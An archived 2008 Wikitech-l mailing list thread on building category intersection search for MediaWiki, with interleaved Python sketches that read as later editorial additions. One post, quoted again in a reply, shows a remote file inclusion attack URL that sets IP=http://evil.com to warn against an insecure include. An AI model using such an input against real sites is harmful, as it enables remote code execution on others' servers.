Mailing List Archive: Wikipedia: Wikitech

So... status of category intersections?

 

 



tstarling at wikimedia

Apr 23, 2008, 7:15 AM

Post #26 of 59
Re: So... status of category intersections?

Andrew Garrett wrote:
> On Wed, Apr 23, 2008 at 9:40 PM, Mark Clements <gmane [at] kennel17> wrote:
>> From an extension writer's point of view, the current situation is to put in
>> a relative require_once() line to commandLine.inc and hope that the file is
>> in the expected place.
>
> global $IP;
> require_once( "$IP/maintenance/commandLine.inc" );
>
> What am I missing?

Besides not working, that would be an arbitrary remote code execution
vulnerability:

http://example.com/w/extensions/TheExtension/updateExtension.php?IP=http://evil.com

A better way to do it is:

require( dirname(__FILE__).'/../../maintenance/commandLine.inc' );

If that path doesn't exist, the sysadmin can create it. Scripts that rely
on the working directory being $IP or whatever are really annoying.

-- Tim Starling


_______________________________________________
Wikitech-l mailing list
Wikitech-l [at] lists
https://lists.wikimedia.org/mailman/listinfo/wikitech-l


ssanbeg at ask

Apr 23, 2008, 8:29 AM

Post #27 of 59
Re: So... status of category intersections?

On Tue, 22 Apr 2008 20:01:43 +0200, Roan Kattouw wrote:

> Steve Sanbeg wrote:
>>
>> So maybe it would make sense to develop an extension that would use the
>> category ID with an SMW like front end, using code broken off from both
>> extensions?
> Wouldn't it be better just to improve SMW's category handling?
>
> Roan Kattouw (Catrope)

That should be the end result. But it seems it's been decided that
SMW is too monolithic, and Markus has already offered to split parts into
smaller extensions, so this seems like the logical place to start.

-Steve





gmane at kennel17

Apr 23, 2008, 8:38 AM

Post #28 of 59
Re: So... status of category intersections?

"Tim Starling" <tstarling [at] wikimedia> wrote in
message news:fung8v$bon$1 [at] ger
> Andrew Garrett wrote:
> > On Wed, Apr 23, 2008 at 9:40 PM, Mark Clements <gmane [at] kennel17> wrote:
> >> From an extension writer's point of view, the current situation is to put in
> >> a relative require_once() line to commandLine.inc and hope that the file is
> >> in the expected place.
> >
> > global $IP;
> > require_once( "$IP/maintenance/commandLine.inc" );
> >
> > What am I missing?
>
> Besides not working, that would be an arbitrary remote code execution
> vulnerability:
>
> http://example.com/w/extensions/TheExtension/updateExtension.php?IP=http://evil.com
>

$IP is not defined at the point that the script is run. $IP is defined by
including commandLine.inc, so you're getting into a bit of a circular
scenario there... :-)


> A better way to do it is:
>
> require( dirname(__FILE__).'/../../maintenance/commandLine.inc' );
>
> If that path doesn't exist, the sysadmin can create it. Scripts that rely
> on the working directory being $IP or whatever are really annoying.
>

That is the current method, which causes problems as detailed in my previous
post. To expand on your point, scripts that rely on the extension being in
the extensions folder are also annoying.

We provide MediaWiki to our clients via a symlink in their web folder. They
have an 'extensions' folder in their home directory where they can add their
own extensions (the MW extensions folder is also used for the MW extensions
we have enabled globally and which we offer support for). Currently there
is no easy way for them to run the maintenance scripts for the extensions
they have locally installed without hacking the code to fix the paths.

- Mark Clements (HappyDog)






gmane at kennel17

Apr 23, 2008, 8:38 AM

Post #29 of 59
Re: So... status of category intersections?

"Simetrical" <Simetrical+wikilist [at] gmail>
wrote in message
news:7c2a12e20804221716xaa6f5cflf216ff28c6324015 [at] mail
> On Tue, Apr 22, 2008 at 5:59 PM, Mark Clements wrote:
> > And, of course, it doesn't help when that's not the case, which is the
> > situation for us. For technical reasons, all extensions are outside
> > the MW source folder entirely.
>
> Symlinks work perfectly in that case (as is true for my localhost, for
> instance, since it's running a checked-out version of
> mediawiki/trunk/). I agree it's not great practice, though: maybe you
> could try to use the current working directory? That seems even less
> reliable.

I imagine an 'updateExtension' script in the 'maintenance' folder that
include()s the appropriate command line/site settings/etc. files then looks
for a script with the appropriate name (based on the extension name which is
supplied as first arg on command line - 'ExtName' in this example) in the
following places.

*/extensions/ExtName/maintenance.php
*/ExtName/maintenance.php

Where * means anywhere in the include path. If the file exists, run it with
the remaining arguments passed through, for which there should be a
standardised subset that most extensions use (e.g. 'install' and 'upgrade')
though extension-specific items are allowed. If no arg (or an unexpected
arg) is provided then the extension file is expected to print out the
details about available items (i.e. equivalent to 'help').

- Mark Clements (HappyDog)
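
The lookup described in this post could be sketched roughly as follows. This is an illustration in Python, not MediaWiki code: the function name `find_maintenance_script`, the `CANDIDATE_LAYOUTS` tuple and the name check are assumptions made for the example. The check on the extension name is there because the name comes from the command line and ends up in a file path.

```python
import re
from pathlib import Path
from typing import Iterable, Optional

# The two layouts named in the post, relative to each include-path entry.
CANDIDATE_LAYOUTS = (
    "extensions/{name}/maintenance.php",
    "{name}/maintenance.php",
)


def find_maintenance_script(ext_name: str, include_path: Iterable[str]) -> Optional[Path]:
    """Return the first existing maintenance script for ext_name, or None.

    Hypothetical helper: the extension name is restricted to letters,
    digits and underscores so that it cannot contain path separators
    or '..' components.
    """
    if not re.fullmatch(r"[A-Za-z0-9_]+", ext_name):
        raise ValueError(f"invalid extension name: {ext_name!r}")
    for root in include_path:
        for layout in CANDIDATE_LAYOUTS:
            candidate = Path(root) / layout.format(name=ext_name)
            if candidate.is_file():
                return candidate
    return None
```

A wrapper script would call this with the first command-line argument and the configured include path, then hand the remaining arguments ('install', 'upgrade', and so on) to the script it found, or print a help message if nothing matched.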








gerard.meijssen at gmail

Apr 23, 2008, 9:01 AM

Post #30 of 59
Re: So... status of category intersections?

Hoi,
It would be cool if there were more clarity about this. Semantic MediaWiki
has been around for a long time. All the major criticisms of the past have
been dealt with. It cannot be said that the code is unknown or unknowable.
It has only one new command, it performs much better compared to last year,
it is being localised at Betawiki. I was told that even Wikia supports it on
request for its wikis...

Being able to break the SMW code into parts is indicative of code that is
built in a modular way. To my mind, SMW would make a bigger difference than
the introduction of catalogs. It would be a massive boost to our aim of making
information available to the world.

Truly, if Semantic MediaWiki is not to be considered, at least be clear about
why. The alternative is unpleasant speculation and technical solutions that
are not necessarily the best.

Thanks,
GerardM

On Wed, Apr 23, 2008 at 5:29 PM, Steve Sanbeg <ssanbeg [at] ask> wrote:

> On Tue, 22 Apr 2008 20:01:43 +0200, Roan Kattouw wrote:
>
> > Steve Sanbeg wrote:
> >>
> >> So maybe it would make sense to develop an extension that would use the
> >> category ID with an SMW like front end, using code broken off from both
> >> extensions?
> > Wouldn't it be better just to improve SMW's category handling?
> >
> > Roan Kattouw (Catrope)
>
> That should be the end result. But it seems it's been decided that
> SMW is too monolithic, and Markus has already offered to split parts into
> smaller extensions, so this seems like the logical place to start.
>
> -Steve


aerik at thesylvans

Apr 23, 2008, 10:10 AM

Post #31 of 59
Re: So... status of category intersections?

On Tue, 22 Apr 2008, Simetrical wrote:

>
> On Tue, Apr 22, 2008 at 10:59 AM, Roan Kattouw <roan.kattouw [at] home>
> wrote:
> > I missed the explanation of the fulltext implementation. Something like
> > 'Foo With_spaces Bar' and then do a fulltext search for the cats you
> > need? That would be more powerful, and would probably be faster for
> > complex intersections. I'll write an alternative to
> > CategoryIntersections that uses the fulltext schema and run some
> > benchmarks. I expect to have some results by the end of the week.
>
> Aerik Sylvan has already done an implementation of the backend using
> CLucene. If a front-end could be done in core, with a pluggable
> backend, that might have the best chance of getting enabled on
> Wikimedia relatively quickly. MyISAM fulltext is not necessarily
> going to be fast enough due to the locking.
>
>
Yes, I did a fulltext search (which works quite well - I forget the response
times... I think it was around a third of a second even for intersections of
large groups, like "Living_People") and the way it handles booleans and
stuff is quite nice. I think I broke it when I moved servers, but I can put
it back up. I think it would probably be a great addition to core, and
would be very adequate for small wikis, but too slow for larger ones
(performance at a few tenths of a second will really add up with tens or
hundreds of hits...) I think doing updates is also an issue on large wikis,
due to table locking of the MyISAM table. But, I think it will be fine for
small wikis. MySQL doesn't break on underscores, so using the category as
it appears in the url seems to work great for fulltext search, and the built
in fulltext search is *much* faster than doing lookups on the categorylinks
table, especially for large sets.

So, I'd propose that in core we add a MyISAM table with a fulltext index of
categories - this will suit small wikis. For big wikis, make this an InnoDB
table and use it to build a Lucene index, which you'd search with whatever
flavor of Lucene you like. This is a fairly straight path that covers both
core and large wikis, should have good performance for either application,
and is flexible in that it does boolean searches. I don't have suggestions
for an interface, but why not just start with a SpecialPage and see what
happens? Once the functionality is there, suggestions for how to better use
it will come out of the woodwork.

I'm working on a CLucene daemon (calling it clucened, which is on SF - with
slightly out-of-date source in subversion - and at clucened.com), which
could be used for this, or anything else. I'm planning to make it Solr
compatible, but not a direct port of Solr, and the implementation will have
some differences. So far I have only the daemon and the search function
(takes a raw query, which can be boolean or have multiple fields, and passes
it through). I think this is really cool, but if we already have a GCJ
Lucene search for En, it may be easier just to extend that to read a
categories Lucene index than to use another architecture. Either way, I think
a search daemon will find an audience and will be a really cool thing :-)


Aerik

--
http://www.wikidweb.com - the Wiki Directory of the Web
http://tagthis.info - Hosted Tagging for your website!
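
To make the idea above concrete, here is a small sketch of searching a "page id plus category string" table with boolean conditions. It is written in Python with an in-memory inverted index standing in for the MyISAM fulltext index or a Lucene index; the sample rows and the names `build_index` and `intersect` are made up for illustration. Each category keeps its underscores, so one category is exactly one whitespace-separated token.

```python
from collections import defaultdict


def build_index(page_categories):
    """Map each category token to the set of page ids that carry it.

    page_categories: dict of page id -> space-separated category string,
    e.g. {1: "Living_people English_comedy_writers"}.
    """
    index = defaultdict(set)
    for page_id, category_text in page_categories.items():
        for token in category_text.split():
            index[token].add(page_id)
    return index


def intersect(index, required, excluded=()):
    """Pages that are in every `required` category and in no `excluded` one."""
    if not required:
        return set()
    # Start from the smallest set so the intermediate result stays small.
    postings = sorted((index.get(cat, set()) for cat in required), key=len)
    result = set(postings[0])
    for pages in postings[1:]:
        result &= pages
    for cat in excluded:
        result -= index.get(cat, set())
    return result


if __name__ == "__main__":
    # Hypothetical sample rows, not real wiki data.
    rows = {
        1: "Living_people English_comedy_writers",
        2: "Living_people Articles_needing_cleanup",
        3: "English_comedy_writers",
    }
    idx = build_index(rows)
    print(intersect(idx, ["Living_people", "English_comedy_writers"]))
```

A real backend would replace the dictionary with the fulltext or Lucene index; the point of the sketch is only that an intersection reduces to AND-ing the posting sets of the requested categories.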


roan.kattouw at home

Apr 23, 2008, 12:45 PM

Post #32 of 59
Re: So... status of category intersections?

Aerik Sylvan wrote:
> Yes, I did a fulltext search (which works quite well - I forget the
> response
> times... I think it was around a third of a second even for intersections of
> large groups, like "Living_People") and the way it handles booleans and
> stuff is quite nice. I think I broke it when I moved servers, but I can put
> it back up. I think it would probably be a great addition to core, and
> would be very adequate for small wikis, but too slow for larger ones
> (performance at a few tenths of a second will really add up with tens or
> hundreds of hits...) I think doing updates is also an issue on large wikis,
> due to table locking of the MyISAM table. But, I think it will be fine for
> small wikis. MySQL doesn't break on underscores, so using the category as
> it appears in the url seems to work great for fulltext search, and the built
> in fulltext search is *much* faster than doing lookups on the categorylinks
> table, especially for large sets.
>
What I was actually wondering is how fulltext compares to
MinuteElectron's categoryintersections table (see posts earlier this
week), but I guess fulltext will be faster, especially for complex queries.
> So, I'd propose that in core we add a MyISAM table with a fulltext index of
> categories - this will suit small wikis. For big wikis, make this an InnoDB
> table and use it to build a Lucene index, which you'd search with whatever
> flavor of Lucene you like. This is a fairly straight path, that covers both
> core and large wikis, should have good performance for either application,
> and is flexible in that it does boolean searches. I don't have suggestions
> for an interface, but why not just start with a SpecialPage and see what
> happens? Once the functionality is there, suggestions for how to better use
> it will come out of the woodwork.
That SpecialPage is present in the CategoryIntersections extension,
you'd just need to change the backend code.

Roan Kattouw (Catrope)



dgerard at gmail

Apr 23, 2008, 12:48 PM

Post #33 of 59
Re: So... status of category intersections?

2008/4/23 Aerik Sylvan <aerik [at] thesylvans>:

> Yes, I did a fulltext search (which works quite well - I forget the response
> times... I think it was around a third of a second even for intersections of
> large groups, like "Living_People") and the way it handles booleans and
> stuff is quite nice. I think I broke it when I moved servers, but I can put
> it back up. I think it would probably be a great addition to core, and
> would be very adequate for small wikis, but too slow for larger ones
> (performance at a few tenths of a second will really add up with tens or
> hundreds of hits...)


What's the actual rate of searches on en:wp?


- d.



Simetrical+wikilist at gmail

Apr 23, 2008, 12:53 PM

Post #34 of 59
Re: So... status of category intersections?

On Wed, Apr 23, 2008 at 3:48 PM, David Gerard <dgerard [at] gmail> wrote:
> What's the actual rate of searches on en:wp?

For what, category intersections? Zero; the feature isn't enabled. :)



brion at wikimedia

Apr 23, 2008, 12:59 PM

Post #35 of 59
Re: So... status of category intersections?

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

David Gerard wrote:
> 2008/4/23 Aerik Sylvan <aerik [at] thesylvans>:
>
>> Yes, I did a fulltext search (which works quite well - I forget the response
>> times... I think it was around a third of a second even for intersections of
>> large groups, like "Living_People") and the way it handles booleans and
>> stuff is quite nice. I think I broke it when I moved servers, but I can put
>> it back up. I think it would probably be a great addition to core, and
>> would be very adequate for small wikis, but too slow for larger ones
>> (performance at a few tenths of a second will really add up with tens or
>> hundreds of hits...)
>
>
> What's the actual rate of searches on en:wp?

At this moment, about 184 searches per second on all sites together,
spread over 16 backend servers. (Not sure offhand which are just enwiki.)

http://ganglia.wikimedia.org/pmtpa/?m=search_rate&c=Search

- -- brion vibber (brion @ wikimedia.org)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkgPlRgACgkQwRnhpk1wk44zkwCgiHmZIFBSKAaY6RtuhnRcCSFC
VMsAn1L8FpMUL2yDJsd26nz8Ar2aRwkM
=c4JS
-----END PGP SIGNATURE-----
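
For a rough sense of scale, the figures in this post can be turned into per-server numbers. The sketch below is plain arithmetic in Python. The 0.3 second query time is an assumption borrowed from the recalled "around a third of a second" for the fulltext prototype earlier in the thread; it is not a measurement of the existing search servers, and nothing here says category intersections would see the same traffic as ordinary search.

```python
# Figures quoted in the post above.
SEARCHES_PER_SECOND = 184   # all sites together
BACKEND_SERVERS = 16


def per_server_rate(total_rate: float, servers: int) -> float:
    """Average request rate each server sees if load is spread evenly."""
    return total_rate / servers


def queries_in_flight(rate_per_second: float, seconds_per_query: float) -> float:
    """Little's law: average concurrency = arrival rate x time per query."""
    return rate_per_second * seconds_per_query


if __name__ == "__main__":
    rate = per_server_rate(SEARCHES_PER_SECOND, BACKEND_SERVERS)
    print(f"{rate:.1f} searches/s per server on average")

    # ASSUMPTION: 0.3 s per query, the figure recalled for the fulltext
    # prototype; purely hypothetical for this workload.
    busy = queries_in_flight(SEARCHES_PER_SECOND, 0.3)
    print(f"about {busy:.0f} queries in flight at any moment")
```

Spread evenly, 184 searches per second over 16 servers is 11.5 per server.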



brion at wikimedia

Apr 23, 2008, 1:00 PM

Post #36 of 59
Re: So... status of category intersections?

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Aerik Sylvan wrote:
> So, I'd propose in core we add a MyISAM table with a fulltext index of
> categories - this will suit small wikis.

Probably reasonable...

> For big wikis, make this an InnoDB
> table and use it to build a Lucene index, which you'd search with whatever
> flavor of Lucene you like.

Probably also reasonable. :)

Should check whether Robert's already hacked some of this stuff into the
lucene server or what changes it would require.

- -- brion vibber (brion @ wikimedia.org)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkgPlW8ACgkQwRnhpk1wk47B1QCgjrktFMS9/FdWVHkHzePFV73O
S9oAnjtZNNtUcBwxW++nGAVwc8eRmWhn
=ly7g
-----END PGP SIGNATURE-----



minuteelectron at googlemail

Apr 23, 2008, 1:11 PM

Post #37 of 59
Re: So... status of category intersections?

Roan Kattouw wrote:
> What I was actually wondering is how fulltext compares to
> MinuteElectron's categoryintersections table (see posts earlier this
> week), but I guess fulltext will be faster, especially for complex queries.
>
Just to clarify: I have not written a category intersection extension of any
sort; it is Magnus's.

MinuteElectron.




roan.kattouw at home

Apr 23, 2008, 1:34 PM

Post #38 of 59
Re: So... status of category intersections?

Brion Vibber wrote:
> Should check whether Robert's already hacked some of this stuff into the
> lucene server or what changes it would require.
>
>
If I understand correctly, Lucene shouldn't really care what it stores,
as long as it's text and it's searchable. Storing "Living_people
Articles_needing_cleanup" would work just fine, right? We do need to
think about case-sensitivity, though.

Roan Kattouw (Catrope)
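
The case-sensitivity point can be illustrated with a small sketch. It assumes the usual MediaWiki title convention (spaces become underscores, the first letter is capitalised by default, the rest of the title stays case-sensitive); the function names `normalize_category` and `fold_key` are invented for this example. Under that convention "Living_People" and "Living_people" are different categories, so an index that folds case would merge things the wiki keeps apart.

```python
import re


def normalize_category(name: str) -> str:
    """Normalise a category name the way a title is usually stored.

    Runs of spaces/underscores collapse to one underscore and only the
    first character is upper-cased; the rest keeps its case.
    """
    collapsed = re.sub(r"[\s_]+", "_", name.strip()).strip("_")
    return collapsed[:1].upper() + collapsed[1:]


def fold_key(name: str) -> str:
    """Case-insensitive lookup key; a design choice, not wiki behaviour."""
    return normalize_category(name).casefold()


if __name__ == "__main__":
    for raw in ("living people", "Living_people", "Living_People"):
        print(repr(raw), "->", normalize_category(raw), "/", fold_key(raw))
```

Indexing on `normalize_category` keeps the wiki's own distinctions; indexing on `fold_key` is friendlier to typed queries but would need a second, exact comparison before results are shown.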



rainmansr at gmail

Apr 23, 2008, 2:06 PM

Post #39 of 59
Re: So... status of category intersections?

Roan Kattouw wrote:

>Brion Vibber wrote:
>
>>Should check whether Robert's already hacked some of this stuff into the
>>lucene server or what changes it would require.
>
>If I understand correctly, Lucene shouldn't really care what it stores,
>as long as it's text and it's searchable. Storing "Living_people
>Articles_needing_cleanup" would work just fine, right? We do need to
>think about case-sensitivity, though.

Let me briefly repeat what I said earlier about my experience with this
category intersection thingy. Adding categories to the Lucene index is easy
*IF* they are inside the article, e.g. try this:

http://en.wikipedia.org/w/index.php?title=Special%3ASearch&search=%2Bincategory%3A%22Living+people%22+%2Bincategory%3A%22English+comedy+writers%22&ns0=1&fulltext=Search

This will give you the category intersection of "Living people" and "English
comedy writers" in a fraction of a second.

What I found is that the hard part is keeping the index updated. If we want
the fancy category intersection system discussed here before, we need an
index that is frequently updated, that is integrated with the job queue, that
understands templates, etc.

Lucene is not that good with very frequent updates. The usual setup is to
have an indexer, make snapshots of the index at regular intervals and then
rsync them onto the searchers. The whole process takes time, although for a
category-only index it will probably be fast. I assume there would be at
least a few tens of minutes of lag anyhow. Our current Lucene framework could
easily be used for index distribution and such.

What remains unsolved, however, is keeping the index updated with the latest
changes on the site. If one changes a template with a category in it, the
thing goes on the job queue. I assume there would need to be some kind of
hook that will either log the change somewhere or send data to Lucene
somehow. This is the part of the backend that needs thinking and solving.

r.
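
The search URL in this post is easier to read once decoded: the query is two required `incategory:` terms. The Python sketch below rebuilds the same URL from a list of category names using only the standard library. The helper names `incategory_query` and `search_url` are invented for the example; the parameter names (`title`, `search`, `ns0`, `fulltext`) are simply the ones visible in the URL above.

```python
from urllib.parse import urlencode


def incategory_query(categories):
    """Build a query with one required incategory term per category."""
    return " ".join(f'+incategory:"{name}"' for name in categories)


def search_url(categories, base="http://en.wikipedia.org/w/index.php"):
    """Return a Special:Search URL for the intersection of the categories."""
    params = {
        "title": "Special:Search",
        "search": incategory_query(categories),
        "ns0": "1",          # restrict to the main namespace, as in the post
        "fulltext": "Search",
    }
    return base + "?" + urlencode(params)


if __name__ == "__main__":
    print(incategory_query(["Living people", "English comedy writers"]))
    print(search_url(["Living people", "English comedy writers"]))
```

The first line printed is `+incategory:"Living people" +incategory:"English comedy writers"`, which is the decoded form of the `search` parameter in the post.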





roan.kattouw at home

Apr 24, 2008, 4:40 AM

Post #40 of 59
Re: So... status of category intersections?

Robert Stojnic wrote:
>
> Let me briefly repeat what I said earlier about my experience with this
> category intersection thingy. Adding categories to the Lucene index is easy
> *IF* they are inside the article, e.g. try this:
>
> http://en.wikipedia.org/w/index.php?title=Special%3ASearch&search=%2Bincategory%3A%22Living+people%22+%2Bincategory%3A%22English+comedy+writers%22&ns0=1&fulltext=Search
>
> This will give you the category intersection of "Living people" and "English
> comedy writers" in a fraction of a second.
>
> What I found is that the hard part is keeping the index updated. If we want
> the fancy category intersection system discussed here before, we need an
> index that is frequently updated, that is integrated with the job queue, that
> understands templates, etc.
>
You don't need the article text, just query the categorylinks table.
> Lucene is not that good with very frequent updates. The usual setup is to
> have an indexer, make snapshots of the index at regular intervals and then
> rsync them onto the searchers. The whole process takes time, although for a
> category-only index it will probably be fast. I assume there would be at
> least a few tens of minutes of lag anyhow. Our current Lucene framework could
> easily be used for index distribution and such.
>
Categories don't change that often, so I don't think 10 minutes of lag
is that bad.
> What remains unsolved, however, is keeping the index updated with the latest
> changes on the site. If one changes a template with a category in it, the
> thing goes on the job queue. I assume there would need to be some kind of
> hook that will either log the change somewhere or send data to Lucene
> somehow. This is the part of the backend that needs thinking and solving.
>
There's the LinksUpdate hook, which is also used in Magnus's implementation.

Roan Kattouw (Catrope)



aerik at thesylvans

Apr 24, 2008, 10:06 AM

Post #41 of 59
Re: So... status of category intersections?

On Wed, 23 Apr 2008, Robert Stojnic wrote:

>
> Roan Kattouw wrote:
>
> >Brion Vibber wrote:
> >
> >>Should check whether Robert's already hacked some of this stuff into the
> >>lucene server or what changes it would require.
> >
> >If I understand correctly, Lucene shouldn't really care what it stores,
> >as long as it's text and it's searchable. Storing "Living_people
> >Articles_needing_cleanup" would work just fine, right? We do need to
> >think about case-sensitivity, though.
>
> Let me briefly repeat what I said earlier about my experience with this
> category intersection thingy. Adding categories to the Lucene index is easy
> *IF* they are inside the article, e.g. try this:
>
> http://en.wikipedia.org/w/index.php?title=Special%3ASearch&search=%2Bincategory%3A%22Living+people%22+%2Bincategory%3A%22English+comedy+writers%22&ns0=1&fulltext=Search
>
> This will give you the category intersection of "Living people" and "English
> comedy writers" in a fraction of a second.
>

Hey Robert,
That is really cool - but it seems to be doing a text match on the whole
article, not just the categories... ?


>
> What I found is that the hard part is keeping the index updated. If we want
> the fancy category intersection system discussed here before, we need an
> index that is frequently updated, that is integrated with the job queue, that
> understands templates, etc.
>

That is always the hurdle with Lucene, right? It doesn't do updates, just
delete, re-add, and then optimize (and I'd guess optimizing can get
resource-intensive on a big index).


>
> Lucene is not that good with very frequent updates. The usual setup is to
> have an indexer, make snapshots of the index at regular intervals and then
> rsync them onto the searchers. The whole process takes time, although for a
> category-only index it will probably be fast. I assume there would be at
> least a few tens of minutes of lag anyhow. Our current Lucene framework could
> easily be used for index distribution and such.
>
> What remains unsolved, however, is keeping the index updated with the latest
> changes on the site. If one changes a template with a category in it, the
> thing goes on the job queue. I assume there would need to be some kind of
> hook that will either log the change somewhere or send data to Lucene
> somehow. This is the part of the backend that needs thinking and solving.
>

Well... this isn't a complete plan, just some thoughts (and maybe they're
naive, but I'll give it a shot anyway). I'm thinking of a new table that
holds the page ID and a text field that holds the category strings, leaving
the underscores in place. This gets updated via a hook at the same time an
edit triggers an update to the categorylinks table (I'm not familiar enough
with the code to have the details at hand) - this will handle categories in
templates etc. (leveraging the logic that already deals with this). Okay, so
once you build the table, the updates to that table aren't too bad. In
core, this would be a MyISAM table with a fulltext index. For larger wikis,
this is an InnoDB table.

Then the question (the one I think you're raising) is at what point do we
refresh or update the lucene index from that table? I'm not sure of the
best answer to that question. Is it feasible to do delete/add every time a
category is changed, and then optimize once a day or something? (probably
not, eh?)

What are we doing for the main search index? rebuild daily or so? In an
initial implementation, why not follow the same type of schedule?
Alternately, perhaps do an update and optimize once an hour? Guess it
depends on how much time/resources it takes to update and optimize the
index... But certainly using the same schedule as the main index is a safe
and conservative plan?

Best Regards,
Aerik



--
http://www.wikidweb.com - the Wiki Directory of the Web
http://tagthis.info - Hosted Tagging for your website!


rainmansr at gmail

Apr 24, 2008, 10:20 AM

Post #42 of 59
Re: So... status of category intersections?

>Hey Robert,
>That is really cool - but it seems to be doing a text match on the whole
>article, not just the categories... ?
>
>

No, that actually does category intersection. It's just that the
highlighted text is rather random. /me goes to fix that.

>What are we doing for the main search index? rebuild daily or so? In an
>initial implementation, why not follow the same type of schedule?
>Alternately, perhaps do an update and optimize once an hour? Guess it
>depends on how much time/resources it takes to update and optimize the
>index... But certainly using the same schedule as the main index is a safe
>and conservative plan?
>
>

I guess one would need to try and see. Once Simetrical finishes the
frontend, one could make different backends and see if the update thing
can be worked out nicely.

r.




Simetrical+wikilist at gmail

Apr 24, 2008, 10:31 AM

Post #43 of 59
Re: So... status of category intersections?

On Thu, Apr 24, 2008 at 1:20 PM, Robert Stojnic <rainmansr [at] gmail> wrote:
> Once Simetrical finishes the frontend

. . . or someone does. :)



bryan.tongminh at gmail

Apr 24, 2008, 11:22 AM

Post #44 of 59
Re: So... status of category intersections?

On Wed, Apr 23, 2008 at 11:06 PM, Robert Stojnic <rainmansr [at] gmail> wrote:
> What remains unsolved, however, is keeping the index updated with the latest
> changes on the site. If one changes a template with a category in it, the
> thing goes on the job queue. I assume there would need to be some kind of
> hook that will either log the change somewhere or send data to Lucene
> somehow. This is the part of the backend that needs thinking and solving.
>
LinksUpdateComplete hook?

Bryan





rainmansr at gmail

Apr 24, 2008, 11:33 AM

Post #46 of 59
Re: So... status of category intersections?

Bryan Tong Minh wrote:

>On Wed, Apr 23, 2008 at 11:06 PM, Robert Stojnic <rainmansr [at] gmail> wrote:
>
>> What remains unsolved, however, is keeping the index updated with the latest
>> changes on the site. If one changes a template with a category in it, the
>> thing goes on the job queue. I assume there would need to be some kind of
>> hook that will either log the change somewhere or send data to Lucene
>> somehow. This is the part of the backend that needs thinking and solving.
>
>LinksUpdateComplete hook?

Something like that, yes, but hook probably couldn't just connect to the
lucene indexer and queue updates, since the indexer might be down for
this or that reason... It might be a better solution to put updates into
some table with date attached and then let the indexer fetch updates.
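
[Editor's sketch] The "table with date attached" idea can be modelled in a few lines. This is only an illustration in Python with an in-memory SQLite database, not MediaWiki code: the table name index_updates, its columns, and the functions record_change and fetch_updates are all hypothetical. It also assumes the indexer remembers a sequence number rather than a date as its position, so that two changes with the same timestamp cannot be skipped.

```python
import sqlite3


def create_log(conn):
    # Hypothetical update-log table: one row per page whose links changed.
    conn.execute(
        "CREATE TABLE IF NOT EXISTS index_updates ("
        " seq INTEGER PRIMARY KEY AUTOINCREMENT,"
        " page_id INTEGER NOT NULL,"
        " changed_at TEXT NOT NULL)"
    )


def record_change(conn, page_id, changed_at):
    # What a LinksUpdateComplete-style hook would do: write a row and return.
    # It never talks to the indexer, so it does not care if the indexer is down.
    conn.execute(
        "INSERT INTO index_updates (page_id, changed_at) VALUES (?, ?)",
        (page_id, changed_at),
    )
    conn.commit()


def fetch_updates(conn, after_seq):
    # What the indexer would do whenever it is up: pull everything newer than
    # the last row it has seen, and return the new position plus the distinct
    # page ids in first-seen order.
    rows = conn.execute(
        "SELECT seq, page_id FROM index_updates WHERE seq > ? ORDER BY seq",
        (after_seq,),
    ).fetchall()
    if not rows:
        return after_seq, []
    pages = []
    for _, page_id in rows:
        if page_id not in pages:
            pages.append(page_id)
    return rows[-1][0], pages
```

The point of the design is that the write side and the read side never have to be up at the same time: the indexer simply resumes from its stored position after an outage.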

r.




roan.kattouw at home

Apr 24, 2008, 12:13 PM

Post #47 of 59 (936 views)
Permalink
Re: So... status of category intersections? [In reply to]

Robert Stojnic wrote:
> Something like that, yes, but the hook probably couldn't just connect to the
> lucene indexer and queue updates, since the indexer might be down for
> this or that reason... It might be a better solution to put updates into
> some table with date attached and then let the indexer fetch updates.
>
>
Maybe use the job queue for this? We could put pending updates in the
job queue, and re-add the job if the indexer is down.
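
[Editor's sketch] A rough model of the re-add behaviour, in Python rather than against the real MediaWiki job queue. The names run_jobs, send_to_indexer and IndexerDown are hypothetical and exist only for this illustration; the queue is a plain in-memory deque.

```python
from collections import deque


class IndexerDown(Exception):
    """Raised by the (hypothetical) sender when the indexer is unreachable."""


def run_jobs(queue, send_to_indexer, max_jobs):
    # Run at most max_jobs pending updates. A job that fails because the
    # indexer is down goes back to the end of the queue instead of being lost.
    done = []
    for _ in range(min(max_jobs, len(queue))):
        page_id = queue.popleft()
        try:
            send_to_indexer(page_id)
        except IndexerDown:
            queue.append(page_id)  # re-add the job for a later run
        else:
            done.append(page_id)
    return done
```

Bounding each run by max_jobs matters here: without it, a down indexer would make the runner spin on the same re-added jobs forever.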

Roan Kattouw (Catrope)



bryan.tongminh at gmail

Apr 24, 2008, 12:23 PM

Post #48 of 59 (937 views)
Permalink
Re: So... status of category intersections? [In reply to]

On Thu, Apr 24, 2008 at 8:33 PM, Robert Stojnic <rainmansr [at] gmail> wrote:
>
> Bryan Tong Minh wrote:
>
> >On Wed, Apr 23, 2008 at 11:06 PM, Robert Stojnic <rainmansr [at] gmail> wrote:
> >
> >
> >> What remains unsolved, however, is keeping the index updated with the
> >> latest changes
> >> on the site. If one changes a template with a category in it, the thing
> >> goes on the job queue.
> >> I assume there would need to be some kind of hook that will either log
> >> the change somewhere
> >> or send data to lucene somehow. This is the part of the backend that
> >> needs thinking and solving.
> >>
> >>
> >>
> >LinksUpdateComplete hook?
> >
> >
>
> Something like that, yes, but the hook probably couldn't just connect to the
> lucene indexer and queue updates, since the indexer might be down for
> this or that reason... It might be a better solution to put updates into
> some table with date attached and then let the indexer fetch updates.
>
>
Hmm, too bad we don't have a recentlinkchanges table.
(https://bugzilla.wikimedia.org/show_bug.cgi?id=13588)



ssanbeg at ask

Apr 24, 2008, 2:09 PM

Post #49 of 59 (940 views)
Permalink
Re: So... status of category intersections? [In reply to]

Well, I can only offer my 2 cents, from my fairly limited experience with
it.

It seems that what's mostly needed now is a front end for category
intersection. The one new function you talk about, and its associated
special pages, are the only implementation of that that I'm aware of.

However, the back end probably has issues, since support for that in core
has only recently been enhanced, and there is still ongoing work, which
would benefit SMW.

Attributes seem to add more complexity and have some more issues that
would need to be worked on. I think that should be a lower priority than
splitting the code, i.e. into a core Semantic MediaWiki that just uses the
existing database schema & namespaces, and another extension that adds
arbitrary tagging/relations.

